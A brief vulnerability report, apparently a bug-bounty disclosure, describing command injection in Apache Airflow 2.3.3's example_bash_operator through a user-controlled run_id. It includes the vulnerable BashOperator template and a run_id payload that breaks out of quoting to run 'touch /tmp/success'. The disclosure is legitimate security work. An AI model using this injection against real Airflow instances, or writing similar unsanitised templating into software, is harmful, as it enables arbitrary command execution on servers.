airflow-2.3.3/airflow/example_dags/example_bash_operator.py has a command injection vulnerability.
I can control the run_id in the following code(example_bash_operator.py),So I can inject custom commands.
also_run_this = BashOperator(
task_id='also_run_this',
bash_command='echo "run_id={{ run_id }} | dag_run={{ dag_run }}"',
)
Enter the DAGs menu and start example_bash_operator task, select βTrigger DAG w/ configβ.Set the run_id to " touch /tmp/success
" and trigger.
{F2036322}
Execute any OS command